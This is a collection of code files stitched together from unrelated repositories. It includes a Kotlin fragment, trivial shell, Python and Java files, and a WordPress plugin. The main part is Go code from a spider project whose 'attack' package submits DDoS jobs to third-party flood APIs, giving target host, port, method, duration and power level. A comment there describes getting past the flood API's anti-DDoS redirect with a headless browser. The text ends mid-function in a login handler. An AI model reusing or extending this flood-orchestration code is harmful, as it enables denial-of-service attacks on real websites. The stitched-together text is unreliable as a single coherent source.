.fallbackToDestructiveMigration()
.build()
dataBaseMap[absoluteDatabasePath] = manager
}
return manager
}
}
}
|
ffce85377b0d1bb9248a129fac17aab94d1853ce
|
[
"Markdown",
"Kotlin"
] | 8 |
Kotlin
|
wytings/DBCache
|
14c2a7e77b600aa091454dcfea8f87ac9722d3ba
|
acd401d9d550bcc5ae742577ea7ec64512d936c3
|
refs/heads/master
|
<file_sep>#!/bin/bash
# My first shell script
echo "Hello World!"
<file_sep>import os
os.system("echo Hello world!")
|
aec1cb8452646ca62121a46e2578b671e09885b0
|
[
"Python",
"Shell"
] | 2 |
Shell
|
D-Limosnero/miscellaneous
|
202096b56eddb96fefe1deae076ab103075655ef
|
08a626212cbccd9f96c8e52bf275336f256f99f8
|
refs/heads/master
|
<file_sep>package bookshelf;
//Here's some stuff to import if you're reading CSV files
/*import java.io.File;
import java.io.FileNotFoundException;
import java.util.Scanner;*/
//Here's how to write main() when using info from CSV files
/*public static void main(String[] args) throws FileNotFoundException {
System.out.println("Here's what's on your bookshelf: ");
Scanner scnr = new Scanner(new File("/Users/jeff/Desktop/books.csv"));
scnr.useDelimiter(",");
while(scnr.hasNext()) {
System.out.print(scnr.next() + "|");
}
scnr.close();
}*/
|
54cf0d08175c14ab3255eac6e47e321d3742d0ea
|
[
"Java"
] | 1 |
Java
|
jeffkillinger/java_bookshelf
|
2d2266aefb6ff91db078336130c5e88ec08b29dd
|
887331f05c64625329218386481c7299205ae75b
|
refs/heads/master
|
<repo_name>leymannx/wordpress-custom-fields<file_sep>/frontpage-fields.php
<?php
/*
Plugin Name: Front Page Custom Fields
Plugin URI: https://github.com/leymannx/wordpress-custom-fields.git
Description: This WordPress plugin some custom fields to a custom post type named "Front Page". Additionally it sets an WYSIWYG editor for some of these fields. Multi-language support enabled.
Version: 1.0
Author: <NAME>
Author URI: http://berlin-coding.de
Text Domain: frontpage-fields
Domain Path: /lang
*/
/**
* Adds custom fields (meta boxes) to Front Page CPT.
*/
function admin_init() {
// add_meta_box( $id = '', $title = '', $callback = '', $screen = '', $context = '' );
add_meta_box( $id = 'quote_author_meta', $title = 'Quote Author', $callback = 'quote_author', $screen = 'frontpage_cpt', $context = 'side' );
add_meta_box( $id = 'box_left_meta', $title = 'Left Box', $callback = 'left_box', $screen = 'frontpage_cpt', $context = 'normal' );
add_meta_box( $id = 'box_right_meta', $title = 'Right Box', $callback = 'right_box', $screen = 'frontpage_cpt', $context = 'normal' );
// Meta boxes for pages.
add_meta_box( $id = 'page_sidebar-right', $title = 'Right Sidebar', $callback = 'page_right_sidebar', $screen = 'page', $context = 'normal' );
}
add_action( 'admin_init', 'admin_init' );
/**
* Meta box callback.
*/
function quote_author() {
global $post;
$custom = get_post_custom( $post->ID );
$quote_author = $custom['quote_author'][0];
?>
<textarea cols="30" rows="1" name="quote_author"><?php echo $quote_author; ?></textarea>
<?php
}
/**
* Meta box callback.
*/
function left_box() {
global $post;
$custom = get_post_custom( $post->ID );
$box_title = $custom['left_box_title'][0];
$box_content = $custom['left_box_content'][0];
?>
<p><label>Box Title</label><br/>
<textarea cols="50" rows="1" name="left_box_title"><?php echo $box_title; ?></textarea></p>
<p><label>Box Content</label><br/>
<?php wp_editor( $content = $box_content, $editor_id = 'left_box_content', $settings = array(
'textarea_name' => 'left_box_content',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) ); ?>
</p>
<?php
}
/**
* Meta box callback.
*/
function right_box() {
global $post;
$custom = get_post_custom( $post->ID );
$box_title = $custom['right_box_title'][0];
$box_content = $custom['right_box_content'][0];
?>
<p><label>Box Title</label><br/>
<textarea cols="50" rows="1" name="right_box_title"><?php echo $box_title; ?></textarea></p>
<p><label>Box Content</label><br/>
<?php wp_editor( $content = $box_content, $editor_id = 'right_box_content', $settings = array(
'textarea_name' => 'right_box_content',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) ); ?>
</p>
<?php
}
/**
* Meta box callback.
*/
function page_right_sidebar() {
global $post;
$custom = get_post_custom( $post->ID );
$sidebar_content = $custom['sidebar'][0];
wp_editor( $content = $sidebar_content, $editor_id = 'page_right_sidebar', $settings = array(
'textarea_name' => 'sidebar',
'media_buttons' => FALSE,
'textarea_rows' => 20,
) );
}
/**
* Ensures meta box values to get saved correctly.
*/
function save_details() {
global $post;
update_post_meta( $post->ID, 'quote_author', $_POST['quote_author'] );
update_post_meta( $post->ID, 'left_box_title', $_POST['left_box_title'] );
update_post_meta( $post->ID, 'left_box_content', $_POST['left_box_content'] );
update_post_meta( $post->ID, 'right_box_title', $_POST['right_box_title'] );
update_post_meta( $post->ID, 'right_box_content', $_POST['right_box_content'] );
update_post_meta( $post->ID, 'sidebar', $_POST['sidebar'] );
}
add_action( 'save_post', 'save_details' );
<file_sep>/README.md
# wordpress-custom-fields
|
0b6ba0e050cb54ffe0ebc1cf6eaa04f2eddb070a
|
[
"Markdown",
"PHP"
] | 2 |
PHP
|
leymannx/wordpress-custom-fields
|
0cfe151517058c30ad2b2eb3380fb7d4ade31be7
|
57a3350e74caf939e0b59d118ba7be084484ac87
|
refs/heads/main
|
<file_sep>import Validator from '../app.js';
test('1', () => {
expect(Validator.validatetelephonenumber('8 (927) 000-00-00')).toEqual('+79270000000');
});
test('2', () => {
expect(Validator.validatetelephonenumber('+7 960 000 00 00')).toEqual('+79600000000');
});
test('3', () => {
expect(Validator.validatetelephonenumber('+86 000 000 0000')).toEqual('+860000000000');
});
<file_sep># ajs_7_2
[](https://ci.appveyor.com/project/Stanislavsus-edu/regex-valid-telephone)
**Легенда**
Вам поручили подумать над тем, чтобы реализовать очистку вводимых номеров телефонов в любом формате (например, как на Госуслугах) и приведения к единому формату: +7xxxxxxxxxx (где вместо x - цифры).
Вам нужно подумать - какой инструмент использовать и выбрать оптимальное, на ваш взгляд, решение (не факт, что оно уместиться в одну строку).
**Описание**
Что мы хотим видеть, мы хотим, что ваша функция работала следующим образом:
* 8 (927) 000-00-00 -> +79270000000
* +7 960 000 00 00 -> +79600000000
* +86 000 000 0000 -> +860000000000
В последнем номере нет ошибки, это Китай. А первые два - РФ.
Не забудьте написать unit-тесты, которые обеспечивают 100% покрытие функций и классов, которые вы тестируете.
|
03e5b1fd974a072887c163c46e5838a3a2c87a97
|
[
"JavaScript",
"Markdown"
] | 2 |
JavaScript
|
Stanislavsus-edu/regex_valid-telephone
|
480bd83189c2ea5fdca0a5c3e1d3000f3c47af39
|
8b6ccc9de418909bf3f79618f54f047c4d9539fe
|
refs/heads/master
|
<repo_name>anuragb26/f1-stats<file_sep>/src/hoc/Layout/Layout.js
import React, { Fragment } from 'react'
import { Container } from 'reactstrap'
import Header from '../../components/Header/Header'
import Footer from '../../components/Footer/Footer'
const layout = ({ children }) => (
<Fragment>
<Container fluid>
<Header />
<section className="app">{children}</section>
<Footer />
</Container>
</Fragment>
)
export default layout
<file_sep>/src/components/Table/Table.js
import React from 'react'
import BootstrapTable from 'react-bootstrap-table-next'
import paginationFactory from 'react-bootstrap-table2-paginator'
import 'react-bootstrap-table-next/dist/react-bootstrap-table2.min.css'
import './Table.scss'
const table = ({
data,
columns,
paginationOptions,
rowClasses,
defaultSorted,
filter
}) => {
const tableProps = {
keyField: 'id',
data,
columns,
bootstrap4: true,
classes: 'mt-3',
headerClasses: 'table__header',
rowClasses,
bordered: false,
pagination: paginationFactory(paginationOptions),
filter,
defaultSorted
}
return <BootstrapTable {...tableProps} />
}
export default table
<file_sep>/README.md
## FinCompare Front-end challenge
This project contains UI codebase for the FinCompare Front-end Challenge
(https://github.com/fincompare/frontend-challenge)
## Public url
https://f1-stats.netlify.com/
## Flow
1)On page mount, show a list that shows the F1 world champions with relevant information starting from 2005 until 2015<br/>
2)Click on any element to open the collapsible content which has the winners of all races for that year in tabular format<br/>
3)The row where the winner is the same as the world champion of that year is highlighted.<br/>
4)Also added Filter functionality for driver name and constructor name.<br/>
## Getting Started
Local Setup:
1. npm install
2. npm start
This will start the server at http://localhost:3000/
## Prerequisites
1)npm
2)node
## Tech Stack
Reactjs (scaffolding -> create-react-app) ,React Router v4
Styling -> SCSS, Bootstrap4(Reactstrap library based on bootstrap4 -> https://reactstrap.github.io/ )
## Folder Structure.
src/containers -> React Components mapped to the routes...can be later used for redux store.
src/components -> React Components
src/assets -> Images,svgs and fonts(whichever necessary)
src/hoc -> Higher Order Components
src/constants -> Config Variables.
src/styles -> SASS based Styles over-riding bootstrap variables wherever necessary
src/utility -> Files for Helper functions.
## Code formatter
prettier -> (https://prettier.io/)
Configured a pre-commit hook in package.json which will automatically format the changed files as per the
config set in .prettierrc
## Commit Messages
https://seesparkbox.com/foundry/semantic_commit_messages
## Author
- **<NAME>** (<EMAIL>)
<file_sep>/src/containers/Home/Home.js
import React, { Component, Fragment } from 'react'
import { Row, Col } from 'reactstrap'
import axios from 'axios'
import Jumbotron from '../../components/Jumbotron/Jumbotron'
import Loader from '../../components/Loader/Loader'
import WinnerInfo from '../../components/WinnerInfo/WinnerInfo'
import {
getWinnersListApiEndpoint,
getRaceWinnersApiEndpoint
} from '../../constants'
import f1 from '../../assets/img/f1.png'
import queryStringUtils from '../../utils/queryStringUtils'
import './Home.scss'
class Home extends Component {
state = {
loading: true,
winnerInfo: {},
raceTable: {},
error: false
}
componentDidMount() {
this.setState(
{
loading: true
},
() => {
axios
.get(
getWinnersListApiEndpoint(
queryStringUtils.createQueryString({
limit: 11,
offset: 55
})
)
)
.then(res => {
this.setState({
loading: false,
winnerInfo: this.getWinnerInfo(res.data)
})
})
}
)
}
getWinnerInfo = data => {
const {
MRData: {
StandingsTable: { StandingsLists: winnerList }
}
} = data
const winnerInfo = winnerList.reduce((prevObj, currentWinner) => {
prevObj[currentWinner.season] = currentWinner.DriverStandings[0]
return prevObj
}, {})
return winnerInfo
}
updateRaceTable = year => {
axios.get(getRaceWinnersApiEndpoint(year)).then(res => {
const { data } = res
this.setState((prevState, props) => ({
raceTable: {
...prevState.raceTable,
[year]: data.MRData.RaceTable.Races
}
}))
})
}
render() {
const {
state: { loading, winnerInfo, raceTable }
} = this
return (
<Fragment>
<Row className="jumbotron-wrapper">
<Col sm="12">
<Jumbotron>
<div className="content-wrapper">
<img src={f1} width={100} alt="logo" />
<p className="lead">F1 world champions from 2005 until 2015</p>
</div>
</Jumbotron>
</Col>
</Row>
<Row className="winner-list-wrapper">
{loading ? (
<Loader />
) : (
<Fragment>
{Object.keys(winnerInfo).map(year => {
const raceTableForYear = raceTable[year] || []
return (
<Col key={year} sm="12">
<div className="px-4 py-4 my-2 info-wrapper">
<WinnerInfo
year={year}
winnerInfo={winnerInfo[year]}
raceTable={raceTableForYear}
updateRaceTable={this.updateRaceTable}
/>
</div>
</Col>
)
})}
</Fragment>
)}
</Row>
</Fragment>
)
}
}
export default Home
<file_sep>/src/components/DriverInfo/DriverInfo.js
import React from 'react'
import './DriverInfo.scss'
const driverInfo = ({ year, driver, name, info, raceInfo, constructor }) => (
<div className="driver-info d-flex">
<div className="winning-year">{year}</div>
<div className="d-flex flex-column justify-content-center">
<div className="personal-info px-3 py-2">
<a target="_blank" rel="noopener noreferrer" href={`${driver.url}`}>
{' '}
<strong>{name}</strong>
</a>
<span>{info}</span>
</div>
<p className="race-info px-3 py-2 lead">
{raceInfo}{' '}
<a
target="_blank"
rel="noopener noreferrer"
href={`${constructor[0].url}`}
>
{`${constructor[0].name}`}
</a>
</p>
</div>
</div>
)
export default driverInfo
|
27bea5b578d79181b5129794c15d568d2f76c8b3
|
[
"JavaScript",
"Markdown"
] | 5 |
JavaScript
|
anuragb26/f1-stats
|
777b876ef5595f21271665c47a67965fae2715b1
|
04523df4957f0b4e3a57c32d575e001dd77905ae
|
refs/heads/master
|
<file_sep>
public class ABAB123 {
public static void main(String[] args) {
String a = "12123456";
String b = new String(a);
b=a.replaceAll("1", "我").replaceAll("2", "你");
System.out.println(b);
}
}
<file_sep>
public class CCC {
public static void main(String[] args) {
String a = "12345678";
char b = '0';
for (int i=0; i<a.length(); i++){
//System.out.println(b);
b = a.charAt(i);
System.out.println(b);
}
//System.out.println(b);
switch(b){
case 1:
System.out.println("一");
break;
}
}
}
<file_sep>import java.awt.Color;
import java.awt.Graphics;
import java.awt.Graphics2D;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.util.Calendar;
import java.util.GregorianCalendar;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.Timer;
public class FirstClock extends JFrame{
public FirstClock() {
super("類比時鐘");
PaintClock paintclock = new PaintClock();
add(paintclock);
Timer timers = new Timer(1000, new ActionListener() {
@Override
public void actionPerformed(ActionEvent ae) {
paintclock.timer();
}
});
timers.start();
setSize(400, 400);
setResizable(false);//設定不可變更視窗大小
setVisible(true);
setDefaultCloseOperation(EXIT_ON_CLOSE);
}
class PaintClock extends JPanel{
Calendar time = new GregorianCalendar();//建立time物件實體 使用Calendar類別的方法
String[] number = {"12","1","2","3","4","5","6","7","8","9","10","11"};
int secend,minute,hour;
int ceneterX = 200,ceneterY = 200;
PaintClock(){
setBackground(Color.LIGHT_GRAY);
}
public void timer() {
// setTimeInMillis依給定的long值來設定目前日曆的現在時間
// public static long currentTimeMillis()方法返回毫秒
time.setTimeInMillis(System.currentTimeMillis());
// 重畫
repaint();
}
@Override
protected void paintComponent(Graphics g) {
super.paintComponent(g);
Graphics2D g2 = (Graphics2D)g;
secend = time.get(Calendar.SECOND);//使用Calendar方法取得時間
minute = time.get(Calendar.MINUTE);
hour = time.get(Calendar.HOUR);
g2.setColor(Color.WHITE);
g2.drawLine(ceneterX, ceneterY, (int)(ceneterX+100*Math.sin(secend*Math.PI/30)),
(int)(ceneterY-100*Math.cos(secend*Math.PI/30)));
g2.setColor(Color.YELLOW);
g2.drawLine(ceneterX, ceneterY, (int) (ceneterX + 80 * Math.sin(minute * Math.PI / 30)),
(int) (ceneterY - 80 * Math.cos(minute * Math.PI / 30)));
g2.setColor(Color.RED);
g2.drawLine(ceneterX, ceneterY, (int) (ceneterX + 60 * Math.sin((hour + minute / 60.0) * Math.PI / 6)),
(int) (ceneterY - 60 * Math.cos((hour + minute / 60.0) * Math.PI / 6)));
paintnumber(g);
}
public void paintnumber(Graphics g2){
for(int i=0;i<12;i++){
g2.setColor(Color.BLACK);
g2.drawString(number[i],(int)(ceneterX+135*Math.sin(i*Math.PI/6))-5,
(int)(ceneterY-135*Math.cos(i*Math.PI/6))+5);
}
g2.setColor(Color.BLUE);
for (int i = 0; i < 60; i++) {
g2.drawLine((int) (ceneterX - 110 * Math.cos(i * Math.PI / 30)), (int) (ceneterY + 110 * Math.sin(i * Math.PI / 30)),
(int) (ceneterX - 120 * Math.cos(i * Math.PI / 30)), (int) (ceneterY + 120 * Math.sin(i * Math.PI / 30)));
}
}
}
public static void main(String[] args) {
new FirstClock();
}
}
<file_sep>import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class CC1234 {
public static void main(String[] args) {
BufferedReader a = new BufferedReader(new InputStreamReader(System.in));
try {
String c = a.readLine();
} catch (Exception e) {
System.out.println("BB");
}
}
}<file_sep>import java.util.Scanner;;
public class TEST_2 {
public static void main(String[] args) {
do{
square();
}while(true);
}
static void square(){
System.out.print("請輸入變數值:"); //輸入變數
Scanner scan = new Scanner(System.in);
int i = scan.nextInt();//建立輸入串流
if(i<31) { //判斷i是否小於31
System.out.println("i的平方為:" + Math.pow(i, 2)); //計算i的平方值
}
else if(i>=31){
System.out.print("錯誤~~~ ");
}
}
}<file_sep>
public class AAA12 {
public static void main(String[] args) {
Brad421 b1 = new Brad422();
Brad422 b2 = (Brad422)b1;
Brad421 b3 = new Brad423();
Brad422 b4 = (Brad422)b3;
}
}
class Brad421 {
void m1(){System.out.println("Brad421:m1()");}
}
class Brad422 extends Brad421 {
void m1(){System.out.println("Brad422:m1()");}
void m2(){System.out.println("Brad422:m2()");}
}
class Brad423 extends Brad421 {
void m1(){System.out.println("Brad423:m1()");}
void m2(){System.out.println("Brad423:m2()");}
}
|
5f42b31779520640bb3796de1b4e50f4edc69b3c
|
[
"Java"
] | 6 |
Java
|
Tim718820/test
|
1eaca6b3986b64aebf57c041e7165f0aac35008e
|
f99e08b2217cd0fec576e7f9831440728d3db36a
|
refs/heads/master
|
<file_sep>package main
import (
"fmt"
"github.com/PuerkitoBio/goquery"
"strings"
// "regexp"
"bytes"
"encoding/binary"
"net"
"github.com/huzorro/ospider/util"
)
func netName() {
addr, _ := net.InterfaceAddrs()
fmt.Println(addr) //[127.0.0.1/8 10.236.15.24/24 ::1/128 fe80::3617:ebff:febe:f123/64],本地地址,ipv4和ipv6地址,这些信息可通过ifconfig命令看到
interfaces, _ := net.Interfaces()
fmt.Println(interfaces) //[{1 65536 lo up|loopback} {2 1500 eth0 34:17:eb:be:f1:23 up|broadcast|multicast}] 类型:MTU(最大传输单元),网络接口名,支持状态
hp := net.JoinHostPort("127.0.0.1", "8080")
fmt.Println(hp) //127.0.0.1:8080,根据ip和端口组成一个addr字符串表示
lt, _ := net.LookupAddr("127.0.0.1")
fmt.Println(lt) //[localhost],根据地址查找到改地址的一个映射列表
cname, _ := net.LookupCNAME("www.wxbsj.com")
fmt.Println(cname) //www.a.shifen.com,查找规范的dns主机名字
host, _ := net.LookupHost("www.wxbsj.com")
fmt.Println(host) //[172.16.58.3 192.168.3.11],查找给定域名的host名称
ip, _ := net.LookupIP("www.hndydb.com")
fmt.Println(ip) //[172.16.58.3 111.13.100.91],查找给定域名的ip地址,可通过nslookup www.baidu.com进行查找操作.
fmt.Println(ip[0].String())
ipp, err := util.LookupHost("www.juanl.net")
if err != nil {
fmt.Println(err)
}
fmt.Printf("ip:%s ``", ipp)
}
func pack2unpack() {
var buf = make([]byte, 8)
binary.BigEndian.PutUint32(buf[:4], uint32(9000))
binary.BigEndian.PutUint32(buf[4:], uint32(9000))
fmt.Println(binary.BigEndian.Uint32(buf[:4]))
fmt.Println(binary.BigEndian.Uint32(buf[4:]))
fmt.Println(binary.BigEndian.Uint64(buf))
binary.BigEndian.PutUint32(buf[:4], uint32(2500))
binary.BigEndian.PutUint32(buf[4:], uint32(1))
fmt.Println(binary.BigEndian.Uint32(buf[:4]))
fmt.Println(binary.BigEndian.Uint32(buf[4:]))
fmt.Println(binary.BigEndian.Uint64(buf))
//19327352841000
var unbuf = make([]byte, 8)
binary.BigEndian.PutUint64(unbuf, uint64(38654705664000))
fmt.Println(binary.BigEndian.Uint32(unbuf[:4]))
fmt.Println(binary.BigEndian.Uint32(unbuf[4:]))
}
func main() {
var htmls = make([]string, 0)
doc, _ := goquery.NewDocument("http://www.oschina.net/news/71633/mongodb-3-3-3")
// doc.
// Find(`#NewsChannel > div.NewsBody > div > div.NewsEntity > div.Body.NewsContent.TextContent>p,
// #NewsChannel > div.NewsBody > div > div.NewsEntity > div.Body.New
// Each(func(i int, q *goquery.Selection){
// fmt.Println(q.Html())
// s, _ := q.Html()
// htmls = append(htmls, s)
// })
// fmt.Println( strings.Join(htmls, ""))
// goquery.NewDocumentFromReader(bytes.NewReader
doc.Find("#OSChina_News_71633").Each(func(i int, q *goquery.Selection) {
html, _ := q.Html()
htmls = append(htmls, html)
})
sub, _ := goquery.NewDocumentFromReader(bytes.NewReader([]byte(strings.Join(htmls, ""))))
sub.Find("img").Each(func(i int, q *goquery.Selection) {
fmt.Println(q.Attr("src"))
})
netName()
pack2unpack()
fmt.Println(0 & 1)
fmt.Println(1 & 1)
fmt.Println(2 & 1)
fmt.Println(3 & 1)
}
<file_sep>package attack
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"github.com/huzorro/ospider/util"
"encoding/json"
"sync"
"net/url"
"fmt"
"github.com/PuerkitoBio/goquery"
"encoding/binary"
)
type AttackSubmit struct {
lock *sync.Mutex
cfg common.Ospider
}
func NewAttackSubmit(co common.Ospider) *AttackSubmit {
return &AttackSubmit{cfg:co, lock:new(sync.Mutex)}
}
func (self *AttackSubmit) Process(payload string) {
var (
attack handler.FloodTarget
api handler.FloodApi
powerlevel uint32
newPowerlevel uint32
time uint32
newTime uint32
)
self.cfg.Log.Println("attack submit...")
if err := json.Unmarshal([]byte(payload), &attack); err != nil {
self.cfg.Log.Printf("json Unmarshal fails %s", err)
return
}
self.lock.Lock()
defer self.lock.Unlock()
// sqlStr := `select id, name, api, powerlevel, time
// from spider_flood_api where uptime < unix_timestamp()
// and time > 0 and powerlevel > 0 and status = 1`
sqlStr := `select id, name, api, powerlevel, time
from spider_flood_api where uptime < unix_timestamp()
and status = 1`
stmtOut, err := self.cfg.Db.Prepare(sqlStr)
defer stmtOut.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
rows, err := stmtOut.Query()
defer rows.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
for rows.Next() {
err = rows.Scan(&api.Id, &api.Name, &api.Api, &api.Powerlevel, &api.Time)
if err != nil {
self.cfg.Log.Printf("rows.Scan (%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint64(powerlevelBuf, uint64(api.Powerlevel))
powerlevel = binary.BigEndian.Uint32(powerlevelBuf[:4])
newPowerlevel = binary.BigEndian.Uint32(powerlevelBuf[4:])
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint64(timeBuf, uint64(api.Time))
time = binary.BigEndian.Uint32(timeBuf[:4])
newTime = binary.BigEndian.Uint32(timeBuf[4:])
if newPowerlevel > 0 && newTime > 0 {
break;
}
}
self.cfg.Log.Printf("powerlevel:%d-%d time:%d-%d", powerlevel, newPowerlevel, time, newTime)
if newPowerlevel <= 0 || newTime <= 0 {
// self.lock.Unlock()
self.cfg.Log.Printf("powerlevel or time run out")
return
}
sqlStr = `update spider_flood_api set time = ?, powerlevel = ? , uptime = unix_timestamp() + ? where id = ?`
stmtIn, err := self.cfg.Db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
binary.BigEndian.PutUint32(powerlevelBuf[4:], newPowerlevel - uint32(attack.Powerlevel))
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint32(timeBuf[:4], time)
binary.BigEndian.PutUint32(timeBuf[4:], newTime - uint32(attack.Time))
self.cfg.Log.Printf("powerlevel:%d-%d-%d time:%d-%d-%d", powerlevel, newPowerlevel, attack.Powerlevel, time, newTime,attack.Time)
_, err = stmtIn.Exec(binary.BigEndian.Uint64(timeBuf), binary.BigEndian.Uint64(powerlevelBuf), attack.Time, api.Id)
if err != nil {
self.cfg.Log.Printf("update flood api fails %s", err)
// self.lock.Unlock()
return
}
// self.lock.Unlock()
//attack submit
u, _ := url.ParseRequestURI(api.Api)
query := u.Query()
// ips, err := net.LookupIP(attack.Url)
// if err == nil {
// attack.Host = ips[0].String()
// }
// self.cfg.Log.Println("lookup host start...")
// ip, err := util.LookupHost(attack.Url)
// self.cfg.Log.Println("lookup host end...")
// if err != nil {
// self.cfg.Log.Println("lookup host fails")
// } else {
// attack.Host = ip
// }
query.Add("host", attack.Host)
query.Add("method", attack.Method)
query.Add("time", fmt.Sprintf("%d", attack.Time))
query.Add("port", attack.Port)
query.Add("powerlevel", fmt.Sprintf("%d", attack.Powerlevel))
u.RawQuery = query.Encode()
self.cfg.Log.Println(u.String())
self.cfg.Log.Println("attack request start...")
response, err := util.HttpGet(u.String())
//目标api为了防止ddos采用了302跳转然后自动刷新到目标api的方法
//采用headless浏览器渲染目标api
// postValues := url.Values{}
// postValues.Add("url", u.String())
// postValues.Add("renderTime", "30")
// postValues.Add("script", "setTimeout(function() { console.log(document);},10000)")
// response, err := util.HttpPost("http://localhost:10010/doload", postValues)
self.cfg.Log.Println("attack request end...")
defer func() {
if response != nil {
response.Body.Close()
}
}()
if err != nil || response == nil {
self.cfg.Log.Printf("request fails {%s}", u.String())
return
}
self.cfg.Log.Println("attack response read start...")
doc, _ := goquery.NewDocumentFromResponse(response)
self.cfg.Log.Printf("{%s} {%s}", u.String(), doc.Text())
self.cfg.Log.Println("attack response read end...")
// sqlStr = `update spider_flood_api set time = ?, powerlevel = ? , uptime = unix_timestamp() + ? where id = ?`
// stmtIn, err := self.cfg.Db.Prepare(sqlStr)
// defer stmtIn.Close()
// if err != nil {
// self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// return
// }
// var powerlevelBuf = make([]byte, 8)
// binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
// binary.BigEndian.PutUint32(powerlevelBuf[4:], newPowerlevel - uint32(attack.Powerlevel))
// var timeBuf = make([]byte, 8)
// binary.BigEndian.PutUint32(timeBuf[:4], time)
// binary.BigEndian.PutUint32(timeBuf[4:], newTime - uint32(attack.Time))
// self.cfg.Log.Printf("powerlevel:%d-%d-%d time:%d-%d-%d", powerlevel, newPowerlevel, attack.Powerlevel, time, newTime,attack.Time)
// _, err = stmtIn.Exec(binary.BigEndian.Uint64(timeBuf), binary.BigEndian.Uint64(powerlevelBuf), attack.Time, api.Id)
// if err != nil {
// self.cfg.Log.Printf("update flood api fails %s", err)
// return
// }
}
<file_sep>
$(function() {
$(window).load(function(){
$.ajax({
url:"/api/spiders",
type:"post",
cache:false,
dataType:"json",
success:spiders
});
});
// $("select[name=Spiderid]").load(function() {
// alert("文档加载完毕!");
// console.log("select load....");
// // $.ajax({
// // url:"/api/spiders",
// // type:"post",
// // cache:false,
// // dataType:"json",
// // success:spiders
// // });
// });
$("#add").click(function() {
console.log("Spiderid" + $("select[name=SpiderId]").val());
$.ajax({
url : "/rule/add",
data : {Name:$("input[name=Name]").val(), SpiderId:$("select[name=SpiderId]").val(),
Url:$("input[name=Url]").val(), Section:$("input[name=Section]").val(),
Href:$("input[name=Href]").val(), Title:$("input[name=Title]").val(),
Content:$("input[name=Content]").val(), Filter:$("input[name=Filter]").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
// $("#my-tab-content").delegate("button[name=operate]", "click", function() {
// console.log($(this).val());
// $.ajax({
// url : "/key/one",
// data : {Id:$(this).val()},
// type : "post",
// cache : false,
// dataType : "json",
// success: keyone
// });
// });
$("button[name=operate]").click(function() {
console.log($(this).val() + "Abc");
$.ajax({
url : "/rule/one",
data : {Id:$(this).val()},
type : "post",
cache : false,
dataType : "json",
success: one
});
});
$("#edit").click(function() {
$.ajax({
url : "/rule/edit",
data : {Id:$("#Id").val(), Name:$("#Name").val(),
SpiderId:$("#SpiderId").val(), Url:$("#Url").val(),
Section:$("#Section").val(), Href:$("#Href").val(),
Title:$("#Title").val(), Content:$("#Content").val(),
Filter:$("#Filter").val(),
Status:$("input[name=Status]:checked").val()},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
$("#infoModal .btn").click(function(){
location.reload();
});
$("#close").click(function(){
location.reload();
});
});
function commonInfo(json) {
if (json.status !== undefined) {
$('#infoModal').modal('toggle');
$('#infoModal p').text(json.text);
// location.reload();
return
}
}
function one(json) {
console.log(json);
$('#editRuleModal').modal('toggle');
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$("#Id").val(json.id);
$("#Name").val(json.name);
// $("#Spiderid").val(json.spiderid);
$("#Url").val(json.url);
$("#Section").val(json.selector.section);
$("#Href").val(json.selector.href);
$("#Title").val(json.selector.title);
$("#Content").val(json.selector.content);
$("#Filter").val(json.selector.filter);
if (json.status) {
htmls.push('<input type="radio" name="Status" value=0 >停用<input type="radio" name="Status" value=1 checked>启用');
} else {
htmls.push('<input type="radio" name="Status" value=0 checked>停用<input type="radio" name="Status" value=1 >启用');
}
$("#Status").html(htmls.join(""));
//select
$("#SpiderId>option").each(function(){
if($(this).val() == json.spiderid) {
$(this).attr("selected","selected");
}
});
}
}
function spiders(json) {
console.log(json);
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$.each(json, function(key, value) {
console.log(key+value.id);
htmls.push("<option value=" + value.id + ">" + value.name + "</option>")
});
$("select[name=SpiderId]").html(htmls.join(""));
$("#SpiderId").html(htmls.join(""))
}
} <file_sep>package user
import (
"database/sql"
"encoding/json"
"github.com/huzorro/spfactor/sexredis"
"github.com/martini-contrib/render"
"github.com/martini-contrib/sessions"
"log"
"net/http"
"net/url"
"strconv"
"strings"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/common"
)
type Status struct {
Status string `json:"status"`
Text string `json:"text"`
}
// type Cfg struct {
// //数据库类型
// Dbtype string `json:"dbtype"`
// //数据库连接uri
// Dburi string `json:"dburi"`
// //页宽
// PageSize int64 `json:"pageSize"`
// }
type UserRelation struct {
User SpStatUser
Role SpStatRole
Access SpStatAccess
}
func Logout(r *http.Request, w http.ResponseWriter, log *log.Logger, session sessions.Session) {
session.Clear()
http.Redirect(w, r, LOGIN_PAGE_NAME, 301)
}
func LoginCheck(r *http.Request, w http.ResponseWriter, log *log.Logger, db *sql.DB, session sessions.Session) (int, string) {
//cross domain
w.Header().Set("Access-Control-Allow-Origin", "*")
un := r.PostFormValue("username")
pd := r.PostFormValue("password")
var (
s Status
)
stmtOut, err := db.Prepare(`SELECT a.id, a.username, a.password, a.roleid, b.name, b.privilege, b.menu,
a.accessid, c.pri_group, c.pri_rule FROM sp_user a
INNER JOIN sp_role b ON a.roleid = b.id
INNER JOIN sp_access_privilege c ON a.accessid = c.id
WHERE username = ? AND password = ? `)
if err != nil {
log.Printf("get login user fails %s", err)
